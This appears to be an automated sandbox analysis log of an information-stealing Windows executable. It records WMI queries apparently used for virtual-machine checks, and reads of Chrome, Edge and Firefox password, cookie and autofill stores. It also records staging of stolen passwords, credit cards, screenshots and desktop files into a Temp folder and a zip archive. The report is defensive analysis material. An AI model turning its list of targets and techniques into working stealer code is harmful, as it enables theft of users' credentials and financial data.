          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2529Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3521Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 2529 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 3521 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
          Source: CreditCardData.0.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: discord.comVMware20,11696494690f
          Source: CreditCardData.0.drBinary or memory string: AMC password management pageVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: CreditCardData.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: CreditCardData.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: CreditCardData.0.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: CreditCardData.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: CreditCardData.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: CreditCardData.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: CreditCardData.0.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: 765iYbgWn9.exe, 00000000.00000003.1889602220.00000270FCA95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware20,11696494690|UE
          Source: CreditCardData.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: CreditCardData.0.drBinary or memory string: global block list test formVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: CreditCardData.0.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: CreditCardData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: CreditCardData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: CreditCardData.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: CreditCardData.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\765iYbgWn9.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.mp3 VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.mp3 VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.mp3 VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.mp3 VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY.xlsx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\SFPUSAFIOL.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\SFPUSAFIOL.docx VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\sensitive-files.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\user_info.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\screen1.png VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\sensitive-files.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\sensitive-files.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\user_info.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\user_info.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
